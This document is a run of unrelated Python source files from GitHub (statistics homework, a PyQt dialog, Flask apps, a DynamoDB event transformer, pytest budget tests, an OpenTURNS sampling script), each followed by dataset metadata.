combined_model.predict(x_test_target_normalized)\n\n# y_pred_target = (y_pred_target_normalized * y_train_source_std) + y_train_source_mean\n\n# r2_target = r2_score(y_test_target, y_pred_target)\n\n# print(\"R2 Score on Target Domain:\", r2_target)\n","repo_name":"z1433223/ITU_AI_PS003","sub_path":"lte_challenge.py","file_name":"lte_challenge.py","file_ext":"py","file_size_in_byte":6009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}{"seq_id":"38657501235","text":"\"\"\"\r\nFrom a general population of n = 50 an elementary sample was drawn and examined with respect to feature X. The results obtained were:\r\n3.6, 5.0, 4.0, 4.7, 5.2, 5.9, 4.5, 5.3, 5.5, 3.9, 5.6, 3.5, 5.4, 5.2, 4.1, 5.0, 3.1, 5.8, 4.8, 4.4, 4.6, 5.1, 4.7, 3.0, 5.5, 6.1, 3.8, 4.9, 5.6, 6.1, 5.9, 4.2, 6.4, 5.3, 4.5, 4.9, 4.0, 5.2, 3.3, 5.4, 4.7, 6.4, 5.1, 3.4, 5.2, 6.2, 4.4, 4.3, 5.8, 3.7\r\n\r\ndetermine:\r\n- the number of classes\r\n- the width of a single class\r\n- the number of elements in each class\r\n\r\ncreate a histogram\r\n\"\"\"\r\n\r\nfrom math import floor\r\nfrom math import sqrt\r\nimport csv\r\n\r\n# list of all measured values\r\nresults = [3.6, 5.0, 4.0, 4.7, 5.2, 5.9, 4.5, 5.3, 5.5, 3.9, 5.6, 3.5, 5.4, 5.2, 4.1, 5.0, 3.1, 5.8, 4.8, 4.4, 4.6, 5.1, 4.7, 3.0, 5.5, 6.1, 3.8, 4.9, 5.6, 6.1, 5.9, 4.2, 6.4, 5.3, 4.5, 4.9, 4.0, 5.2, 3.3, 5.4, 4.7, 6.4, 5.1, 3.4, 5.2, 6.2, 4.4, 4.3, 5.8, 3.7]\r\nresults_rising = sorted(results)\r\n\r\n# number of measured elements\r\nsize = len(results)\r\n\r\n# number of classes\r\nclasses = sqrt(size)\r\nclasses = floor(classes)\r\n
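# Added note: square-root rule, floor(sqrt(50)) = 7 classes for n = 50\r\n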
\\n\")\n\nprint(\"class1 wartosci:\", class1, \"\\nclass1 liczba elementow: \", len(class1))\nprint(\"class2 wartosci:\", class2, \"\\nclass2 liczba elementow: \", len(class2))\nprint(\"class3 wartosci:\", class3, \"\\nclass3 liczba elementow: \", len(class3))\nprint(\"class4 wartosci:\", class4, \"\\nclass4 liczba elementow: \", len(class4))\nprint(\"class5 wartosci:\", class5, \"\\nclass5 liczba elementow: \", len(class5))\nprint(\"class6 wartosci:\", class6, \"\\nclass6 liczba elementow: \", len(class6))\nprint(\"class7 wartosci:\", class7, \"\\nclass7 liczba elementow: \", len(class7))\n\n# dopisywanie wartosc do pliku CSV\n#kolumna 1: indeks klasy, kolumna 2: liczba elementow w klasie\nwith open(\"data.csv\", \"w\", newline='') as file:\n writer = csv.writer(file, delimiter=\";\")\n\n writer.writerow(('class1', len(class1)))\n writer.writerow(('class2', len(class2)))\n writer.writerow(('class3', len(class3)))\n writer.writerow(('class4', len(class4)))\n writer.writerow(('class5', len(class5)))\n writer.writerow(('class6', len(class6)))\n writer.writerow(('class7', len(class7)))\n\n# dopiswanie wartosci do pliku TXT\n#kolumna 1: indeks klasy, kolumna 2: liczba elementow w klasie\nplik = open(\"data.txt\", \"w\")\n\nplik.write((str(1) + \" \" + str(len(class1))))\nplik.write(\"\\n\")\nplik.write((str(2) + \" \" + str(len(class2))))\nplik.write(\"\\n\")\nplik.write((str(3) + \" \" + str(len(class3))))\nplik.write(\"\\n\")\nplik.write((str(4) + \" \" + str(len(class4))))\nplik.write(\"\\n\")\nplik.write((str(5) + \" \" + str(len(class5))))\nplik.write(\"\\n\")\nplik.write((str(6) + \" \" + str(len(class6))))\nplik.write(\"\\n\")\nplik.write((str(7) + \" \" + str(len(class7))))\n\nplik.close()\n\n\"\"\"\ngnuplot:\n\tset tics font \"Helvetica,15\" \n\tset ytics 1\t\todstep na osi y co 1 miejsce\n\tset xtics 1\t\todstep na osi x co 1 miejsce\n\n set xlabel \"numer klasy\" legenda\n\tset ylabel \"liczba elementow\" legenda\n\n plot \"data.txt\" u 1:2 t \"liczba elementow w danej klasie\" w lp \n\n\"\"\"","repo_name":"babypawcio/statistics-data-analysis-homework","sub_path":"feature of the population/populacja cecha x.py","file_name":"populacja cecha x.py","file_ext":"py","file_size_in_byte":4648,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33512244159","text":"import logging\n\nfrom PyQt6 import uic\nfrom PyQt6.QtWidgets import QDialog\n\nfrom constants.directions import *\nfrom structures.domains import Domains\nfrom structures.points import Nucleoside\nfrom structures.strands import Strands\n\nlogger = logging.getLogger(__name__)\n\n\nclass NucleosideInformer(QDialog):\n \"\"\"A QDialog to display information about a Nucleoside.\"\"\"\n\n def __init__(\n self, parent, nucleoside: Nucleoside, all_strands: Strands, all_domains: Domains\n ):\n \"\"\"\n Initialize the NucleosideInformer.\n\n Args:\n parent: The strands widget for the dialog.\n nucleoside: The Nucleoside to display information about.\n all_strands: The strands that contain the Nucleoside.\n all_domains: The domains that contain the Nucleoside.\n \"\"\"\n super().__init__(parent)\n assert isinstance(all_strands, Strands)\n assert isinstance(all_domains, Domains)\n assert isinstance(nucleoside, Nucleoside)\n\n self.setWindowTitle(\"Nucleoside Information\")\n uic.loadUi(\"ui/dialogs/informers/nucleoside.ui\", self)\n\n logger.info(\"Displaying information for %s\", nucleoside)\n\n self.x_coordinate.setText(f\"{nucleoside.x_coord:.4f} nanometers\")\n 
self.z_coordinate.setText(f\"{nucleoside.z_coord:.4f} nanometers\")\n        self.angle.setText(f\"{nucleoside.angle:.4f}°\")\n\n        strand_index = all_strands.index(nucleoside.strand)\n        if nucleoside.strand.closed:\n            openness = \"closed\"\n        else:  # not nucleoside.strand.closed\n            openness = \"open\"\n        self.strand.setText(\n            f\"nucleoside #\"\n            f\"{nucleoside.strand.items.by_type(Nucleoside).index(nucleoside) + 1} in\"\n            f\" {openness} strand #{strand_index + 1}\"\n        )\n        self.helix.setText(\n            f\"nucleoside {nucleoside.helical_index} of helix {id(nucleoside.helix)}\"\n        )\n\n        self.original_domain.setText(\n            f\"domain #{nucleoside.domain.index + 1} of {all_domains.count} domains\"\n        )\n\n        if nucleoside.direction == UP:\n            self.up.setChecked(True)\n        elif nucleoside.direction == DOWN:\n            self.down.setChecked(True)\n\n        style = (\n            \"QTextEdit{{\"\n            \"color: rgb(0, 0, 0); \"\n            \"font-size: {font_size}px; \"\n            \"text-align: center; \"\n            \"background: rgb(255, 255, 255)\"\n            \"}};\"\n        )\n        if nucleoside.base is None:\n            self.base.setStyleSheet(style.format(font_size=10))\n            self.base.setText(\"Unset\\nBase\")\n        else:\n            self.base.setStyleSheet(style.format(font_size=32))\n            self.base.setText(nucleoside.base)\n","repo_name":"NATuG3/NATuG3","sub_path":"ui/dialogs/informers/nucleoside.py","file_name":"nucleoside.py","file_ext":"py","file_size_in_byte":2710,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"12511954844","text":"import os\r\nimport uuid\r\nfrom flask import render_template, request, redirect, flash, abort\r\nfrom app import app, db, celery\r\nfrom app.models import ImageRequest, READY, NOT_READY\r\nfrom PIL import Image\r\nfrom app.forms import ImageForm\r\n\r\nALLOWED_EXTENSIONS = ['png', 'jpg']\r\nUPLOAD_FOLDER = os.path.join('app', 'static')\r\n\r\n\r\ndef allowed_file(filename):\r\n    return '.' in filename and filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\r\n\r\n\r\n@celery.task(bind=True)\r\ndef change_img_size(self, filename, w, h, Id):\r\n    img = Image.open(os.path.join(UPLOAD_FOLDER, filename))\r\n    new_img = img.resize((w, h))\r\n    new_img.save(fp=os.path.join(UPLOAD_FOLDER, filename))\r\n\r\n    db.session.query(ImageRequest). \\\r\n        filter_by(id=Id). 
\\\r\n        update({'status': READY})\r\n    db.session.commit()\r\n    return {'status': 'Task completed!'}\r\n\r\n\r\n@app.route('/', methods=['POST', 'GET'])\r\ndef index():\r\n    form = ImageForm()\r\n    if form.validate_on_submit():\r\n        w = form.w.data\r\n        h = form.h.data\r\n        file = form.img.data\r\n        if allowed_file(file.filename):\r\n            file_extension = os.path.splitext(file.filename)[1]\r\n            filename = str(uuid.uuid4()) + file_extension\r\n            file.save(os.path.join(UPLOAD_FOLDER, filename))\r\n            flash('File successfully uploaded')\r\n            new_record = ImageRequest(w=w, h=h, img_path=filename)\r\n            db.session.add(new_record)\r\n            db.session.commit()\r\n            change_img_size.apply_async(args=[filename, w, h, new_record.id])\r\n            flash('Your task id is ' + str(new_record.id))\r\n            return render_template('index.html', form=form), 202\r\n        else:\r\n            flash('Allowed file types are png, jpg')\r\n            return redirect(request.url), 301\r\n\r\n    return render_template('index.html', form=form), 200\r\n\r\n\r\n@app.route('/status/<task_id>')\r\ndef task_status(task_id):\r\n    if db.session.query(ImageRequest).filter_by(id=task_id).first():\r\n        ImageRequestRecord = ImageRequest.query.get(task_id)\r\n        return render_template('status.html', ImageRequest=ImageRequestRecord), 200\r\n    else:\r\n        abort(404)\r\n
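\r\n\r\n# --- Editor's addition: a minimal smoke-test sketch, not part of the original app.\r\n# It assumes the app wiring imported above works and that the referenced templates\r\n# exist; run it manually, e.g. `python -m app.views`.\r\nif __name__ == '__main__':\r\n    with app.test_client() as client:\r\n        # a plain GET of the upload form is expected to return 200 from index()\r\n        assert client.get('/').status_code == 200\r\n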
","repo_name":"KondratievaOlesya/Resize-server","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38208623785","text":"import os\nimport pandas as pd\nimport csv\npy_bank = \"budget_data_IO.csv\"\n\ndate = []\nmonthly_change = []\ncount_month = 0\ntotal_profit = 0\ntotal_change_profits = 0\ninitial_profit = 0\n# open as csv file\nwith open(py_bank, newline=\"\") as csvfile:\n\n    # store file information in variable csvreader\n    csvreader = csv.reader(csvfile, delimiter=',')\n    # print(csvreader). Initially used to test if it reads the file; put a # in front of it after verifying.\n\n    # skip the header of the file\n    csv_header = next(csvreader)\n\n    for row in csvreader:\n        # count_month counts the number of months (rows)\n        count_month += 1\n\n        # calculate the total profit\n        total_profit += int(row[1])\n\n        # store dates in a list (used when locating the greatest increase and decrease)\n        date.append(row[0])\n\n        # month-to-month change in profits; the first row has no previous month,\n        # so no change is recorded for it\n        final_profit = int(row[1])\n        if count_month > 1:\n            monthly_change_profits = final_profit - initial_profit\n            monthly_change.append(monthly_change_profits)\n            total_change_profits += monthly_change_profits\n        initial_profit = final_profit\n\n    # average month-to-month change (there are count_month - 1 changes)\n    average_change_profits = total_change_profits / (count_month - 1)\n\n    # find the max and min change in profits and the dates they were observed;\n    # monthly_change[k] is the change *into* month k+1, hence the index shift\n    greatest_increase = max(monthly_change)\n    greatest_decrease = min(monthly_change)\n    increase_date = date[monthly_change.index(greatest_increase) + 1]\n    decrease_date = date[monthly_change.index(greatest_decrease) + 1]\n\n    print(\"Financial Analysis\")\n    print(\"----------------------------------------------------------\")\n    print(\"Total Months: \" + str(count_month))\n    print(\"Total Profits: \" + \"$\" + str(total_profit))\n    print(\"Average Change: \" + \"$\" + str(round(average_change_profits, 2)))\n    print(\"Greatest Increase in Profits: \" + str(increase_date) + \" ($\" + str(greatest_increase) + \")\")\n    print(\"Greatest Decrease in Profits: \" + str(decrease_date) + \" ($\" + str(greatest_decrease) + \")\")\n    print(\"----------------------------------------------------------\")
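\n\n# --- Editor's addition (hypothetical cross-check, not in the original script):\n# pandas is imported above but never used; the aggregates could be sanity-checked\n# with it along these lines:\n# df = pd.read_csv(py_bank)\n# assert df[df.columns[1]].sum() == total_profit\n# assert round(df[df.columns[1]].diff().dropna().mean(), 2) == round(average_change_profits, 2)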
","repo_name":"ItunuOye/python-challenge","sub_path":"PyBank.py","file_name":"PyBank.py","file_ext":"py","file_size_in_byte":2658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20703924761","text":"# ------------------------------------------------------------------------ #\r\n# Title: Assignment 08\r\n# Description: Working with classes\r\n\r\n# ChangeLog (Who,When,What):\r\n# RRoot,1.1.2030,Created started script\r\n# RRoot,1.1.2030,Added pseudo-code to start assignment 8\r\n# Bruenger,6/1/21,Added Product Class\r\n# Bruenger,6/1/21,Added Menu Code and code for options 1,2,3.\r\n# Bruegner,6/2/21,Got as far as I could before running out of time.\r\n# ------------------------------------------------------------------------ #\r\n\r\n# Data -------------------------------------------------------------------- #\r\nstrFileName = 'products.txt'\r\nlstOfProductObjects = []\r\n\r\n\r\nclass Product():\r\n    \"\"\"Stores data about a product:\r\n\r\n    properties:\r\n        product_name: (string) with the product's name\r\n        product_price: (float) with the product's standard price\r\n    methods:\r\n    changelog: (When,Who,What)\r\n        RRoot,1.1.2030,Created Class\r\n        ,,Modified code to complete assignment 8\r\n    \"\"\"\r\n    # Fields\r\n    strName = \"\"\r\n    fltPrice = \"\"\r\n\r\n    def __init__(self, name, price):\r\n        self.strName = name\r\n        self.fltPrice = price\r\n\r\n\r\nobjP1 = Product(\"Cool Thing\", 50)\r\n# Data -------------------------------------------------------------------- #\r\n\r\n\r\n# Processing ------------------------------------------------------------- #\r\ndef read_data_from_file(list_of_rows):\r\n    \"\"\" Reads data from the products file into a list of dictionary rows\r\n\r\n    :param list_of_rows: (list) you want filled with file data:\r\n    :return: (list) of dictionary rows\r\n    \"\"\"\r\n    list_of_rows.clear()  # clear current data\r\n    file = open(strFileName, \"r\")\r\n    for line in file:\r\n        name, price = line.split(\",\")\r\n        row = {\"Name\": name.strip(), \"Price\": price.strip()}\r\n        list_of_rows.append(row)\r\n    file.close()\r\n    return list_of_rows, 'Success'\r\n\r\n\r\ndef write_data_to_file(list_of_rows):\r\n    objFile = open(strFileName, \"w\")\r\n    for row in list_of_rows:\r\n        objFile.write(row[\"Name\"] + ',' + row[\"Price\"] + '\\n')\r\n    objFile.close()\r\n    # print(\"\\tData saved to file!\")\r\n\r\n\r\nclass FileProcessor:\r\n    \"\"\"Processes data to and from a file and a list of product objects:\r\n\r\n    methods:\r\n        save_data_to_file(file_name, list_of_product_objects):\r\n\r\n        read_data_from_file(file_name): -> (a list of product objects)\r\n\r\n    changelog: (When,Who,What)\r\n        RRoot,1.1.2030,Created Class\r\n        ,,Modified code to complete assignment 8\r\n    \"\"\"\r\n    pass\r\n
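    # Editor's note: the module-level read_data_from_file/write_data_to_file\r\n    # functions above already implement this behavior; one way to finish the\r\n    # assignment would be to move them in here as @staticmethods.\r\n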
\r\n\r\n# Processing ------------------------------------------------------------- #\r\n\r\n\r\n# Presentation (Input/Output) -------------------------------------------- #\r\nclass IO:\r\n    # TODO: Add docstring\r\n    pass\r\n\r\n    @staticmethod\r\n    def print_menu_products():\r\n        \"\"\" Display a menu of choices to the user\r\n\r\n        :return: nothing\r\n        \"\"\"\r\n        print('''\r\n        Menu of Options\r\n        1) Add a new Product\r\n        2) Save Data to File \r\n        3) Reload Data from File\r\n        4) Exit Program\r\n        ''')\r\n        print()  # Add an extra line for looks\r\n\r\n    @staticmethod\r\n    def print_current_products_in_list(list_of_rows):\r\n        \"\"\" Shows the current Products in the list of dictionaries rows\r\n\r\n        :param list_of_rows: (list) of rows you want to display\r\n        :return: nothing\r\n        \"\"\"\r\n        print(\"******* The current Products ToDo are: *******\")\r\n        for row in list_of_rows:\r\n            print(row[\"Name\"] + \" (\" + row[\"Price\"] + \")\")\r\n        print(\"*******************************************\")\r\n        print()  # Add an extra line for looks\r\n\r\n    @staticmethod\r\n    def input_yes_no_choice(message):\r\n        \"\"\" Gets a yes or no choice from the user\r\n\r\n        :return: string\r\n        \"\"\"\r\n        return str(input(message)).strip().lower()\r\n\r\n    @staticmethod\r\n    def input_press_to_continue(optional_message=''):\r\n        \"\"\" Pause program and show a message before continuing\r\n\r\n        :param optional_message: An optional message you want to display\r\n        :return: nothing\r\n        \"\"\"\r\n        print(optional_message)\r\n        input('Press the [Enter] key to continue.')\r\n\r\n    @staticmethod\r\n    def input_menu_choice():\r\n        \"\"\" Gets the menu choice from a user\r\n\r\n        :return: string\r\n        \"\"\"\r\n        choice = str(input(\"Which option would you like to perform? [1 to 4] - \")).strip()\r\n        print()  # Add an extra line for looks\r\n        return choice\r\n\r\n    # TODO: Add code to show the current data from the file to user\r\n\r\n    @staticmethod\r\n    def input_new_product():\r\n        strName = input(\"Enter a Name: \")\r\n        strPrice = input(\"Enter a Price: \")\r\n        dicRow = {\"Name\": strName, \"Price\": strPrice}\r\n        lstOfProductObjects.append(dicRow)\r\n        dicRow = str(dicRow).replace(\"{\", \"(\")\r\n        dicRow = str(dicRow).replace(\"}\", \")\")\r\n        dicRow = str(dicRow).replace(\"'\", \"\")\r\n        print()\r\n        print(\"\\t The record \" + dicRow + \" was added!\")\r\n\r\n# Presentation (Input/Output) -------------------------------------------- #\r\n\r\n# Main Body of Script ---------------------------------------------------- #\r\nwhile True:\r\n    # Step 3 Show current data\r\n    IO.print_menu_products()  # Shows menu\r\n    strChoice = IO.input_menu_choice()  # Get menu option\r\n\r\n    # Step 4 - Process user's menu choice\r\n    if strChoice.strip() == '1':  # Add a new Product\r\n        IO.input_new_product()\r\n        IO.input_press_to_continue()\r\n        continue  # to show the menu\r\n\r\n    elif strChoice == '2':  # Save Data to File\r\n        strChoice = IO.input_yes_no_choice(\"Save this data to file? (y/n) - \")\r\n        if strChoice.lower() == \"y\":\r\n            write_data_to_file(lstOfProductObjects)\r\n            IO.input_press_to_continue()\r\n        else:\r\n            IO.input_press_to_continue(\"Save Cancelled!\")\r\n        continue  # to show the menu\r\n\r\n    elif strChoice == '3':  # Reload Data from File\r\n        print(\"Warning: Unsaved Data Will Be Lost!\")\r\n        strChoice = IO.input_yes_no_choice(\"Are you sure you want to reload data from file? (y/n) - \")\r\n        if strChoice.lower() == 'y':\r\n            read_data_from_file(lstOfProductObjects)  # reload file data into the list\r\n            IO.input_press_to_continue()\r\n        else:\r\n            IO.input_press_to_continue(\"File Reload Cancelled!\")\r\n        continue  # to show the menu\r\n\r\n    elif strChoice == '4':  # Exit Program\r\n        print(\"Goodbye!\")\r\n        break  # and Exit\r\n# Load data from file into a list of product objects when script starts\r\n# Show user current data in the list of product objects\r\n# Main Body of Script ---------------------------------------------------- #\r\n","repo_name":"Bruengerjr/IntroToProg-Python-Mod08","sub_path":"Assigment08-Starter.py","file_name":"Assigment08-Starter.py","file_ext":"py","file_size_in_byte":6781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24946853848","text":"######################################################################################################################\n# Author: Sakitha Ariyarathne\n# Date: 02/08/2022\n# Project: Distribution system coordination\n######################################################################################################################\n\n# Need two command line inputs;\n# 1. Directory path\n# 2. System name\n#\n# The script assumes that the 'inputData' and 'outputData' folders exist inside the directory. 
Also, inside the\n# 'inputData' folder there must be a folder for the system containing all the data files.\n\n# VOLL is set to 1000\n# max flow on lines is set to 99999\n# base value for conductance and susceptance is set to 10000\n\nimport numpy as np\nimport numpy.random\n\nfrom GUI import *\n\nnp.random.seed(10)\n\n# global variables\ndirectory = \"\"\nnetwork_name = \"\"\nsystem_name = \"\"\nnum_systems = 0\nnum_iterations = 300\ninput_dir = \"\"\noutput_dir = \"\"\n\n\n# main frame\nroot = tk.Tk()\nroot.title(\"Exchange Electricity\")\nroot.iconbitmap(r\"images/appIcon.ico\")\nroot.geometry(\"900x500\")\nroot.config(bg=\"#80c1ff\")\n\nmain_frame(root)\n\nbutton_exit = tk.Button(root, text=\"Exit\", command=root.quit, bg=\"white\", fg=\"black\")\nbutton_exit.place(relx=0.9, rely=.93, relwidth=0.08, relheight=0.05)\n\n\nroot.mainloop()\n","repo_name":"Sakitha1989/DistributionSystemCoordination","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73752857708","text":"from flask import Flask, render_template, flash\r\nfrom flask_wtf import Form\r\nfrom wtforms import StringField, SubmitField\r\nfrom wtforms.validators import DataRequired\r\n\r\napp = Flask(__name__)\r\napp.config['DEBUG'] = True\r\napp.config['SECRET_KEY'] = 'well-secret-password'\r\n\r\n\r\nclass MyForm(Form):\r\n    name = StringField(label='Name', validators=[DataRequired()])\r\n    starting = SubmitField(label='Starting')\r\n    ending = SubmitField(label='Ending')\r\n\r\n\r\n@app.route('/index', methods=['GET', 'POST'])\r\ndef index():\r\n    form = MyForm()\r\n\r\n    if form.validate_on_submit():\r\n        print(\"Starting data Value : {value}\".format(value=form.starting.data))\r\n        print(\"Ending data Value : {value}\".format(value=form.ending.data))\r\n        flash(\r\n            \"You submitted name {name} via button {button}\".format(\r\n                name=form.name.data,\r\n                button=\"Starting\" if form.starting.data else \"Ending\"\r\n            )\r\n        )\r\n\r\n        return render_template('testbuttons.html', form=form)\r\n\r\n    if form.errors:\r\n        for error_field, error_message in form.errors.items():\r\n            flash(\"Field : {field}; error : {error}\".format(field=error_field, error=error_message))\r\n\r\n    return render_template('testbuttons.html', form=form)\r\n\r\n\r\nif __name__ == '__main__':\r\n    app.run(debug=True, host='0.0.0.0')","repo_name":"Hristiyan-Andreev/flask-tests","sub_path":"WTFFormsTests/testbuttons.py","file_name":"testbuttons.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40098838366","text":"import json\nfrom boto3.dynamodb.types import TypeDeserializer\nfrom collections import defaultdict\nfrom dataclasses import dataclass\nfrom dateutil import parser\nfrom decimal import Decimal\n\n\n@dataclass\nclass TransformedMessageGroup:\n    table_name: str\n    date_id: str\n    events: list[dict]\n\n\nclass MessageTransformer:\n    deserialiser = TypeDeserializer()\n\n    def load_messages(self, messages) -> None:\n        self.file_values = defaultdict(list)\n        for sqs_event in messages:\n            dynamodb_event = json.loads(sqs_event['Body'])\n\n            transformed = self.transform_event(dynamodb_event)\n\n            key = (transformed['table'], transformed['date_id'])\n            self.file_values[key].append(transformed)\n\n        self.transformed_message_groups = []\n        for (table_name, date_id), events in self.file_values.items():\n            events.sort(key=lambda x: 
x['modified_at'])\n            self.transformed_message_groups.append(TransformedMessageGroup(\n                table_name=table_name,\n                date_id=date_id,\n                events=events,\n            ))\n\n    def get_transformed_messages(self) -> list[TransformedMessageGroup]:\n        return self.transformed_message_groups\n\n    def get_unique_date_ids(self) -> set[str]:\n        return {g.date_id for g in self.transformed_message_groups}\n\n    @classmethod\n    def transform_event(cls, event) -> dict:\n        response = {}\n        event_type = event['eventName']\n\n        if event_type in {'INSERT', 'MODIFY'}:\n            key_values = event['dynamodb']['NewImage']\n\n        elif event_type == 'REMOVE':\n            key_values = event['dynamodb']['OldImage']\n\n        else:\n            raise NotImplementedError(event_type)\n\n        response['meta_event_type'] = event_type\n        for key, value in key_values.items():\n            response[key] = cls.deserialiser.deserialize(value)\n\n        response = cls.remove_decimals(response)\n\n        date = parser.parse(response['modified_at'])\n        response['date_id'] = date.strftime('%Y-%m-%d')\n\n        return response\n\n    @classmethod\n    def remove_decimals(cls, key_values) -> dict:\n        for key, value in key_values.items():\n            if isinstance(value, Decimal):\n                key_values[key] = int(value)\n\n            elif isinstance(value, dict):\n                key_values[key] = cls.remove_decimals(value)\n\n            elif isinstance(value, list):\n                key_values[key] = [cls.remove_decimals(v) for v in value]\n\n        return key_values\n
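\n\n# --- Editor's addition: a hedged smoke-test sketch, not part of the original module.\n# The attribute names below ('table', 'modified_at') mirror what load_messages and\n# transform_event expect; the concrete values are made up for illustration.\nif __name__ == '__main__':\n    fake_sqs_message = {'Body': json.dumps({\n        'eventName': 'INSERT',\n        'dynamodb': {'NewImage': {\n            'table': {'S': 'game'},\n            'modified_at': {'S': '2023-01-02T03:04:05'},\n            'score': {'N': '42'},\n        }},\n    })}\n    transformer = MessageTransformer()\n    transformer.load_messages([fake_sqs_message])\n    print(transformer.get_unique_date_ids())  # expected: {'2023-01-02'}\n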
","repo_name":"Nick-Sullivan/death-dice","sub_path":"lambda/history/layer/python/transformer.py","file_name":"transformer.py","file_ext":"py","file_size_in_byte":2420,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"25460813220","text":"import pytest\nfrom sqlalchemy.ext.asyncio import AsyncSession\nfrom src import crud\nfrom src.models.budget import BudgetCreate, BudgetUpdate\nfrom src.tests.utils.budget import create_test_budget\nfrom src.tests.utils.user import create_random_user\n\n\n@pytest.mark.asyncio\nasync def test_create_budget(db: AsyncSession) -> None:\n    user = await create_random_user(db)\n    # code from create_test_budget copied for clarity\n    budget = BudgetCreate(amount=400, name=\"test budget\")\n    budget_from_db = await crud.budget.create(db, obj_in=budget, user_id=user.id)\n\n    # NOTE: this also deletes the user's associated budgets\n    await crud.user.remove(db, id=user.id)\n    assert budget_from_db\n    assert budget_from_db.user_id == user.id\n\n\n@pytest.mark.asyncio\nasync def test_get_all_budgets_for_user(db: AsyncSession) -> None:\n    user = await create_random_user(db)\n    await create_test_budget(db, user_id=user.id)\n    budgets = await crud.budget.get_all_budgets_for_user(db, user_id=user.id)\n\n    await crud.user.remove(db, id=user.id)\n    assert len(budgets) == 1\n    assert budgets[0].user_id == user.id\n\n\n@pytest.mark.asyncio\nasync def test_update_budget(db: AsyncSession) -> None:\n    user = await create_random_user(db)\n    budget_from_db = await create_test_budget(db, user_id=user.id)\n    budget = BudgetUpdate(name=\"updated test budget\")\n    budget_from_db = await crud.budget.update(db, db_obj=budget_from_db, obj_in=budget)\n\n    await crud.user.remove(db, id=user.id)\n    assert budget_from_db.name == budget.name\n","repo_name":"NADEE-MJ/peppermint","sub_path":"backend/src/tests/crud/test_budget.py","file_name":"test_budget.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32090027700","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Nov 20 20:35:47 2018\r\n\r\n\"\"\"\r\n# Using the Newton-Raphson algorithm to find the square root of a number\r\n\r\nprint(\"FINDING THE SQUARE ROOT\")\r\nepsilon = 0.01  # how close I want the guess to get to the answer\r\n\r\nnumber = float(input(\"Enter a number: \"))\r\nnumGuesses = 0\r\nguess = number/2.0\r\n\r\n\r\nwhile abs(guess**2 - number) >= epsilon:\r\n    numGuesses += 1\r\n    guess = guess - ((guess**2)-number)/(2*guess)\r\n\r\nprint(\"Number of Guesses: \" + str(numGuesses)) \r\nprint(\"The Square: \" + str(number) + \"\\nThe square root is about: \" + str(guess))\r\n","repo_name":"vanyarin09/Python-Samples","sub_path":"Edx Python Scripts/FindingSquareRootUsingNewtonRaphson.py","file_name":"FindingSquareRootUsingNewtonRaphson.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10513053599","text":"#! 
/usr/bin/env python\n\nimport openturns as ot\nimport otlhs\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom matplotlib.backends.backend_pdf import PdfPages\nfrom openturns.viewer import View\nimport time\nfrom otlhs.pyplotdesign import PyPlotDesign\n\not.Log.Show(ot.Log.INFO)\n\n# Bounds are [0,1]^dimension\ndimension = 2\nbounds = ot.Interval(dimension)\n\nnSimu = 10000\n\nc2 = otlhs.SpaceFillingC2()\n# Size of sample\nsize = 10\n\nprint(\"dimension=%d, size=%d\"%(dimension, size))\nfor nSimu in [100, 200, 400, 800, 1600, 3200, 6400, 12800, 25600, 51200, 102400, 204800, 409600]:\n ot.RandomGenerator.SetSeed(0)\n # Factory: lhs generates\n lhsDesign = otlhs.LHSDesign(bounds, size)\n mc = otlhs.MonteCarloLHS(lhsDesign, nSimu, c2)\n tic = time.time()\n result = mc.generate()\n toc = time.time()\n print(\"%d %f %f\"%(nSimu,result.getOptimalValue(), toc-tic))\n\npp = PdfPages('small_mc_OTLHS.pdf')\n# plot criterion & save it\ncrit = result.drawHistoryCriterion()\nfig = View(crit, plot_kwargs={'color':'blue'}).getFigure()\npp.savefig(fig)\nplt.close(fig)\n# plot design\nfig = PyPlotDesign(result.getOptimalDesign(), bounds, size, size, plot_kwargs={'color':'blue', 'marker': 'o', 'ms': 6})\nplt.suptitle('LHS design of size=%d - Optimization of %s criterion using %d MC sample'%(size,c2.getName(), nSimu))\nfig.savefig(\"lhs_mc_c2_%d.png\"%size)\nplt.close(fig)\n \nminDist = otlhs.SpaceFillingMinDist()\n\n# Factory: lhs generates\nlhsDesign = otlhs.LHSDesign(bounds, size)\nmc = otlhs.MonteCarloLHS(lhsDesign, nSimu, minDist)\ntic = time.time()\nresult = mc.generate()\ntoc = time.time()\nprint(\"cpu time=%f\"%(toc-tic))\nprint(\"dimension=%d, size=%d,mc=%s\"%(dimension, size, mc))\nprint(\"optimal value=\"+ str(result.getOptimalValue())+\" c2=\"+str(result.getC2())+\" phiP=\"+str(result.getPhiP())+\" minDist=\"+str(result.getMinDist()))\n# plot criterion & save it\ncrit = result.drawHistoryCriterion()\nfig = View(crit, plot_kwargs={'color':'blue'}).getFigure()\npp.savefig(fig)\nplt.close(fig)\n# plot design\nfig = PyPlotDesign(result.getOptimalDesign(), bounds, size, size, plot_kwargs={'color':'red', 'marker': 'o', 'ms': 6})\nplt.suptitle('LHS design of size=%d - Optimization of %s criterion using %d MC sample'%(size,minDist.getName(), 